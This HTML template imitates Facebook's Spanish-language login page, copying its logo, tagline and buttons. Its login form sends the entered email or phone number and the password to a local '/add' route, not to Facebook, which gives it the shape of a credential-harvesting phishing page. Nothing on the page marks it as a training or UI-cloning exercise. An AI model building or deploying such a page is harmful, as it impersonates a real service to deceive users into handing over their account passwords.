<link rel="stylesheet" href="/css/index.css">

<div class="container_facebook">
    <div class="section">
    <div class="section_left">
    <div class="logo_facebook">
        <img class="svg_facebook" src="/img/svgFacebook.svg" alt="Facebook">
    </div>
        <h2 class="text_facebook">Facebook te ayuda a comunicarte y compartir con las personas que forman parte de tu vida.
        </h2>
</div>
<div class="section_right">
    <div class="container_form">
        <div class="form">
            <form action="/add" method="POST">
                <div>
                <div class="inputs_form">
                <input type="text" name="emailOnumber" autofocus class="inputs _inputs_1" placeholder="Correo electrónico o número de teléfono">
            </div>
            <div class="inputs_form">
                <input type="password" name="password" class="inputs _inputs_1" placeholder="Contraseña">
        </div>
    </div>
    <div class="inputs_form">
        <div class="container_button">
            <button class="iniciar_sesion">Iniciar sesión</button>
        </div>
    </div>
            </form>
            <div class="href">
                <a href="" class="password_change">¿Olvidaste tu contraseña?</a>
            </div>
            <div class="hr"></div>
            <div class="Create">
                <a class="Create_account">Crear cuenta nueva</a>
            </div>
        </div>
        <div class="text_2">
            <a href="" class="Page">Crea una página</a>
            para un personaje público, un grupo de música o un negocio.
        </div>
        
    </div>
</div>
</div>
<div class="section_footer">

</div>
</div>

